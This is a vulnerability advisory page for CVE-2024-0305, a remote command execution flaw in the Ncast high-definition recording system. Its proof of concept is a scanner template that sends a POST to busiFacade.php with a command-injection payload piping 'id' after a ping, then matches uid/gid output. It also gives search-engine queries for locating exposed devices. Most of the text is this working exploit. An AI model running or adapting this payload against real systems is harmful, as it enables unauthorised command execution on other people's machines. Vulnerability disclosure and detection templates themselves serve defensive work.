CVE-2024-0305: Ncast busiFacade - Remote Command Execution

日期: 2025-08-01 | 影响软件: Ncast busiFacade | POC: 已公开

漏洞描述

The Ncast Yingshi high-definition intelligent recording and playback system is a newly developed audio and video recording and playback system. The system has RCE vulnerabilities in versions 2017 and earlier.

PoC代码[已公开]

id: CVE-2024-0305

info:
  name: Ncast busiFacade - Remote Command Execution
  author: BMCel
  severity: high
  description: |
    The Ncast Yingshi high-definition intelligent recording and playback system is a newly developed audio and video recording and playback system. The system has RCE vulnerabilities in versions 2017 and earlier.
  impact: |
    Allows remote attackers to execute arbitrary code on the affected system.
  reference:
    - https://cxsecurity.com/cveshow/CVE-2024-0305
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0305
    - https://vuldb.com/?id.249872
    - https://vuldb.com/?ctiid.249872
    - https://github.com/Marco-zcl/POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-0305
    epss-score: 0.93699
    epss-percentile: 0.99843
    cpe: cpe:2.3:a:ncast_project:ncast:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ncast_project
    product: ncast
    shodan-query: http.title:"高清智能录播系统"
    fofa-query:
      - app="Ncast-产品" && title=="高清智能录播系统"
      - title="高清智能录播系统"
      - app="ncast-产品" && title=="高清智能录播系统"
    google-query: intitle:"高清智能录播系统"
    zoomeye-query: title="高清智能录播系统"
  tags: cve,cve2024,ncast,rce,ncast_project,vkev

http:
  - raw:
      - |
        POST /classes/common/busiFacade.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | id"]}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
          - "#str"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402203c35456d97675dc18457859e2868a4a0b54928156efd31593dfc23a750ead2e90220147c314131cee10397829e40281705b2430fc5405197d82bf245c7e521a37538:922c64590222798bb761d5b6d8e72950